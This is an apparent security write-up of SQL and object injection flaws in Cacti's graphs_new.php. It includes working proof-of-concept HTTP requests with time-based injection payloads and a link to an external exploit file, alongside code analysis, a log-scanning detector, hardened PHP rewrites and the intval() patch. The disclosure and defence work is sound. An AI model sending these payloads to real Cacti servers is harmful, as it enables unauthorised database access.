catalogue

. Vulnerability Description
. Trigger Conditions
. Affected Scope
. Code Analysis
. Defense Methods
. Attack and Defense Thoughts

1. Vulnerability Description

Another SQL injection vulnerability via graphs_new.php in Cacti was found and reported as bug http://bugs.cacti.net/view.php?id=2652

Relevant Link:

http://bobao.360.cn/snapshot/index?id=146936

2. Trigger Conditions

0x1: POC1: SQL Injection

POST /cacti/graphs_new.php HTTP/1.1
Host: 192.168.217.133
Proxy-Connection: keep-alive
Cache-Control: max-age=
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.217.133
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.80 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://192.168.217.133/cacti/graphs_new.php?host_id=3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: 1c4af7f2e90e3a789e67a8e3acd2372f=8a83va6ijomgf7qdgfpcl8l1p2; Cacti=j8chtc1ppq4n7viqkbah6c4tv2
Content-Length: 189

__csrf_magic=sid%3Aed226a87fdcc8e055d1c27b620e564d629d95e40%2C1450241184&cg_g=033926697+xor+(select(0)from(select sleep(5))v)&save_component_graph=1&host_id=2&host_template_id=0&action=save

0x2: POC2: Object Injection

. Login
. POST http://target/cacti/graphs_new.php
Data: __csrf_magic=sid%3A55c34c49f0a1e4abf5739766855abdfa96fbc91b%2C1448716384&action=save&save_component_new_graphs=&host_id=&selected_graphs_array=[injection]
{Injection exp can be found on my server: http://pandas.pw/cacti.exp}
. mysql log: select graph_template_id from snmp_query_graph where id= and benchmark(,sha1())--
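The mysql log line above is also the detection hook: both statements involved in this issue end in a plain integer id, so anything else after "where id=" in the general log is worth an alert. As an added example (not part of the original post and not Cacti code), the scanner below applies that rule to constructed general-log lines; the log format and the sample queries are assumptions.

```php
<?php
// Added example: flag general-log entries whose "where id=" predicate is not a bare
// integer literal, for the two statements graphs_new.php issues. Sample lines are
// constructed and the general-log layout ("<time> <id> Query <sql>") is assumed.

/**
 * True when a query against snmp_query_graph or graph_templates carries anything
 * other than a single integer literal after "where id=".
 */
function isSuspiciousGraphQuery(string $query): bool
{
    if (!preg_match('/\bfrom\s+(snmp_query_graph|graph_templates)\s+where\s+id\s*=\s*(.*)$/i', $query, $m)) {
        return false; // not one of the two statements this check covers
    }
    $predicate = trim($m[2]);
    // A benign query ends with exactly one integer literal (optionally a ';').
    return !preg_match('/^\d+\s*;?$/', $predicate);
}

/** Scan log lines and return the suspicious queries keyed by 1-based line number. */
function scanGeneralLog(array $lines): array
{
    $hits = [];
    foreach ($lines as $no => $line) {
        if (!preg_match('/\bQuery\s+(.*)$/', $line, $m)) {
            continue; // only "Query" entries carry SQL text
        }
        if (isSuspiciousGraphQuery($m[1])) {
            $hits[$no + 1] = $m[1];
        }
    }
    return $hits;
}

// Constructed sample log lines: two normal queries, then two tampered ids.
$sample = [
    '2016-01-10T10:00:01.000000Z    12 Query    select graph_template_id from snmp_query_graph where id=7',
    '2016-01-10T10:00:02.000000Z    12 Query    select name from graph_templates where id=12',
    '2016-01-10T10:00:03.000000Z    13 Query    select graph_template_id from snmp_query_graph where id=7 and benchmark(1,sha1(1))--',
    '2016-01-10T10:00:04.000000Z    13 Query    select name from graph_templates where id=0 xor (select(0)from(select sleep(5))v)',
];

foreach (scanGeneralLog($sample) as $no => $query) {
    echo "line $no: $query\n";   // lines 3 and 4 are reported
}
```

The rule is deliberately narrow (two statements, one id predicate), which keeps false positives near zero for this code path; broaden the statement list only after checking that the added queries also end in a single literal.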

3. Affected Scope

4. Code Analysis

0x1: Vuln-1: Object Injection to SQL Injection

/graphs_new.php

/* set default action */
if (!isset($_REQUEST["action"])) { $_REQUEST["action"] = ""; }

switch ($_REQUEST["action"]) {
    case 'save':
        // track function form_save()
        form_save();
        break;
    case 'query_reload':
        host_reload_query();
        header("Location: graphs_new.php?host_id=" . $_GET["host_id"]);
        break;
    default:
        include_once("./include/top_header.php");
        graphs();
        include_once("./include/bottom_footer.php");
        break;
}

form_save();

function form_save()
{
    ..
    if (isset($_POST["save_component_new_graphs"])) {
        // track function host_new_graphs_save()
        host_new_graphs_save();
        header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
    }
}

host_new_graphs_save();

function host_new_graphs_save()
{
    ..
    // $selected_graphs_array is unserialize()d straight from a POST parameter we control, with no filtering
    $selected_graphs_array = unserialize(stripslashes($_POST["selected_graphs_array"]));
    ..
    // the value is then walked as a three-dimensional array, and the attacker-controlled
    // snmp_query_graph_id is concatenated into the SELECT, which is the SQL injection
    $graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . $snmp_query_array["snmp_query_graph_id"]);
    ..
}
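Two things go wrong in host_new_graphs_save(): untrusted data is fed to unserialize(), and a value taken out of it is concatenated into SQL. The script below is an added example (not Cacti's code and not from the original post) that puts the concatenation pattern next to a hardened version: the selection is decoded from JSON instead of PHP serialization, every id must be a canonical integer string, and the id is bound as a parameter. The JSON shape, the field names beyond snmp_query_graph_id, and the use of PDO-style placeholders are assumptions; only the SQL text and its parameters are built, so it runs without a database.

```php
<?php
// Added example, not Cacti's code. Assumed request shape (JSON, not serialize()):
//   [{"snmp_query_id": 1, "snmp_query_graph_id": 7, "snmp_index": "3"}, ...]
// Queries are returned as [sql, params] for a PDO-style prepared statement.

/** True only for an int or a canonical digit string ("12"); never "12 abc", " 12" or "0x1". */
function isPlainInteger($value): bool
{
    return is_int($value) || (is_string($value) && $value !== '' && ctype_digit($value));
}

/** The pattern from the original code: the id goes straight into the SQL text. */
function buildQueryUnsafe(array $snmpQueryArray): array
{
    $sql = "select graph_template_id from snmp_query_graph where id=" . $snmpQueryArray["snmp_query_graph_id"];
    return [$sql, []];
}

/** Hardened: reject anything that is not a plain integer, then bind it as a parameter. */
function buildQuerySafe(array $snmpQueryArray): array
{
    $id = $snmpQueryArray["snmp_query_graph_id"] ?? null;
    if (!isPlainInteger($id)) {
        // intval() would silently turn "7 abc" into 7; failing loudly lets the event be logged.
        throw new InvalidArgumentException('snmp_query_graph_id must be an integer, got ' . var_export($id, true));
    }
    return ["select graph_template_id from snmp_query_graph where id=?", [(int)$id]];
}

/**
 * Replacement for unserialize(stripslashes($_POST[...])): json_decode() produces only
 * arrays and scalars, so no object can be injected, and each field is validated here.
 */
function decodeSelectedGraphs(string $raw): array
{
    $items = json_decode($raw, true);
    if (!is_array($items)) {
        throw new InvalidArgumentException('selected_graphs_array is not valid JSON');
    }
    $clean = [];
    foreach ($items as $item) {
        foreach (['snmp_query_id', 'snmp_query_graph_id'] as $field) {
            if (!isset($item[$field]) || !isPlainInteger($item[$field])) {
                throw new InvalidArgumentException("$field is missing or not an integer");
            }
        }
        // snmp_index is assumed to be free-form, so it is kept as a string and must always be bound.
        $clean[] = [
            'snmp_query_id'       => (int)$item['snmp_query_id'],
            'snmp_query_graph_id' => (int)$item['snmp_query_graph_id'],
            'snmp_index'          => (string)($item['snmp_index'] ?? ''),
        ];
    }
    return $clean;
}

// Constructed input: the second document carries a tampered id.
$good = '[{"snmp_query_id": 1, "snmp_query_graph_id": 7, "snmp_index": "3"}]';
$bad  = '[{"snmp_query_id": 1, "snmp_query_graph_id": "7 abc", "snmp_index": "3"}]';

[$sql, $params] = buildQuerySafe(decodeSelectedGraphs($good)[0]);
echo $sql, "  params=", json_encode($params), "\n";                  // ... where id=?  params=[7]

echo buildQueryUnsafe(['snmp_query_graph_id' => '7 abc'])[0], "\n"; // tampered text reaches the SQL

try {
    decodeSelectedGraphs($bad);
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
```

If the serialized format cannot be changed, the minimum is unserialize($raw, ['allowed_classes' => false]) (PHP 7 and later) followed by the same per-field integer check; that removes the object-injection path but still leaves the application trusting a format designed for its own data, which is why the example switches to JSON.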

0x2: Vuln-2: SQL Injection

function form_save()
{
    if (isset($_POST["save_component_graph"])) {
        /* summarize the 'create graph from host template/snmp index' stuff into an array */
        while (list($var, $val) = each($_POST)) {
            if (preg_match('/^cg_(\d+)$/', $var, $matches)) {
                $selected_graphs["cg"]{$matches[1]}{$matches[1]} = true;
            }
            // cg_g is not filtered
            elseif (preg_match('/^cg_g$/', $var)) {
                if ($_POST["cg_g"] > 0) {
                    $selected_graphs["cg"]{$_POST["cg_g"]}{$_POST["cg_g"]} = true;
                }
            }
            elseif (preg_match('/^sg_(\d+)_([a-f0-9]{32})$/', $var, $matches)) {
                $selected_graphs["sg"]{$matches[1]}{$_POST{"sgg_" . $matches[1]}}{$matches[2]} = true;
            }
        }

        if (isset($selected_graphs)) {
            // the externally supplied parameters are passed into host_new_graphs()
            host_new_graphs($_POST["host_id"], $_POST["host_template_id"], $selected_graphs);
            exit;
        }

        header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
    }

    if (isset($_POST["save_component_new_graphs"])) {
        host_new_graphs_save();
        header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
    }
}

host_new_graphs($_POST["host_id"], $_POST["host_template_id"], $selected_graphs);

function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) {
    /* we use object buffering on this page to allow redirection to another page if no
       fields are actually drawn */
    ob_start();
    include_once("./include/top_header.php");
    print "<form method='post' action='graphs_new.php'>\n";
    $snmp_query_id = 0;
    $num_output_fields = array();

    while (list($form_type, $form_array) = each($selected_graphs_array)) {
        while (list($form_id1, $form_array2) = each($form_array)) {
            if ($form_type == "cg") {
                // sql injection in graph_template_id
                $graph_template_id = $form_id1;
                html_start_box("<strong>Create Graph from '" . db_fetch_cell("select name from graph_templates where id=$graph_template_id") . "'", "100%", "", "", "center", "");
                ..
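The reason the cg_g branch is the weak one is worth making concrete. The cg_<n> branch is safe because its regex captures \d+ and nothing else, so the array key that later becomes $graph_template_id is an integer by construction; cg_g only has to satisfy "$_POST['cg_g'] > 0", a loose comparison that any string starting with digits passes (PHP 7 converts the leading digits, PHP 8 falls back to string comparison, and both say true). The following added example (not Cacti's code, not from the original post) mirrors the loop in form_save() with a $strict switch that applies the same digit-only rule to cg_g; the POST data is constructed.

```php
<?php
// Added example, not Cacti's code: the original key-collection loop from form_save()
// with an optional strict check on cg_g. POST data below is constructed.

function collectSelectedGraphs(array $post, bool $strict): array
{
    $selected = [];
    foreach ($post as $var => $val) {
        if (preg_match('/^cg_(\d+)$/', $var, $m)) {
            // Key passed a \d+-only regex: an integer by construction.
            $selected['cg'][$m[1]][$m[1]] = true;
        } elseif ($var === 'cg_g') {
            $id = $post['cg_g'];
            if ($strict) {
                // Accept only a canonical positive integer string.
                if (!is_string($id) || !ctype_digit($id) || (int)$id <= 0) {
                    continue; // drop it; a deployment would also log the rejected value
                }
            } elseif (!($id > 0)) {
                continue;     // the original check: a loose comparison
            }
            $selected['cg'][$id][$id] = true;
        } elseif (preg_match('/^sg_(\d+)_([a-f0-9]{32})$/', $var, $m)) {
            $selected['sg'][$m[1]][$post['sgg_' . $m[1]] ?? ''][$m[2]] = true;
        }
    }
    return $selected;
}

$post = [
    'cg_12' => 'on',
    'cg_g'  => '12 abc',   // leading digits followed by arbitrary text
];

var_export(array_keys(collectSelectedGraphs($post, false)['cg'] ?? []));  // [12, '12 abc']: tampered key kept
echo "\n";
var_export(array_keys(collectSelectedGraphs($post, true)['cg'] ?? []));   // [12]: tampered key dropped
echo "\n";
```

Note that ctype_digit('0') is true, so the explicit (int)$id <= 0 test is what preserves the original "> 0" semantics; without it a zero id would slip through the strict branch.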

Relevant Link:

http://seclists.org/fulldisclosure/2015/Dec/att-57/cacti_sqli%281%29.txt
http://bugs.cacti.net/view.php?id=2652

5. Defense Methods

/graphs_new.php

function host_new_graphs_save()
{
    ..
    /* before: $graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . $snmp_query_array["snmp_query_graph_id"]); */
    $graph_template_id = db_fetch_cell("select graph_template_id from snmp_query_graph where id=" . intval($snmp_query_array["snmp_query_graph_id"]));
    ..
}

/graphs_new.php

function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) {
    /* we use object buffering on this page to allow redirection to another page if no
       fields are actually drawn */
    ob_start();
    include_once("./include/top_header.php");
    print "<form method='post' action='graphs_new.php'>\n";
    $snmp_query_id = 0;
    $num_output_fields = array();

    while (list($form_type, $form_array) = each($selected_graphs_array)) {
        while (list($form_id1, $form_array2) = each($form_array)) {
            if ($form_type == "cg") {
                // sql injection in graph_template_id
                $graph_template_id = $form_id1;
                /* fix: force the id to an integer before it reaches the query */
                $graph_template_id = intval($graph_template_id);
                /* end fix */
                html_start_box("<strong>Create Graph from '" . db_fetch_cell("select name from graph_templates where id=$graph_template_id") . "'", "100%", "", "", "center", "");
                ..

Relevant Link:

http://www.cacti.net/download_cacti.php

6. Attack and Defense Thoughts

Copyright (c) 2016 Little5ann All rights reserved
